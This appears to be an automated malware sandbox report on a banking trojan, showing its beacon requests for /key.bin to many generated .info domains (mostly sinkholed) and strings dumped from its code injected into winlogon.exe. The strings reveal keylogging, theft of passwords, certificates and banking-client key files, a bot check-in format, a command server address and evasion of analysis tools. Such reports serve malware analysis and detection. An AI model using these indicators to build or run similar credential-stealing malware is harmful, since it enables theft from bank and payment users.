User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: viwemata.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:18 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: ryderule.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: qekenivo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: jeperedi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:04 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rydofale.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:19 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: qekenivo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xudohijy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:16 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: dixoxywy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:09 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: kericura.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:27 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: qekenivo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xudohijy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: gaqycyzu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:41 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: ryderule.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: masewyky.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:02 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: gatofusi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:58 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: nofipymo.info


HTTP/1.1 200 OK

Date: Sun, 29 Oct 2017 17:10:22 GMT

Server: Apache

Set-Cookie: gvc=906vr2568426229522560; expires=Fri, 28-Oct-2022 17:10:22 GMT; Max-Age=157680000; path=/; domain=nofipymo.info; HttpOnly

Content-Length: 51

Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>HTTP/1.1 200 OK..Date: Sun, 29 Oct 2017 17:10:2
2 GMT..Server: Apache..Set-Cookie: gvc=906vr2568426229522560; expires=
Fri, 28-Oct-2022 17:10:22 GMT; Max-Age=157680000; path=/; domain=nofip
ymo.info; HttpOnly..Content-Length: 51..Content-Type: text/html; chars
et=UTF-8..<html><head></head><body><!-- vbe
 --></body></html>..

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xuxelixi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:11 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: typihyqa.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:40 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zyrivuro.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wekanila.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: naselyfu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mamawufo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:21 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xuxelixi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: bonacamy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:59 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mamawufo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:21 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycikoga.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:11 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: viwemata.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:18 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: halybowu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: fobefizi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: kefywiri.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:51 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: halybowu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: halybowu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: fobefizi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zyrivuro.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wekanila.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:09 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xutikexy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xudohijy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rydofale.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:18 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

The Trojan connects to the servers at the folowing location(s):

winlogon.exe_416_rwx_00B40000_000AA000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

winlogon.exe_416_rwx_00CA0000_000B9000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

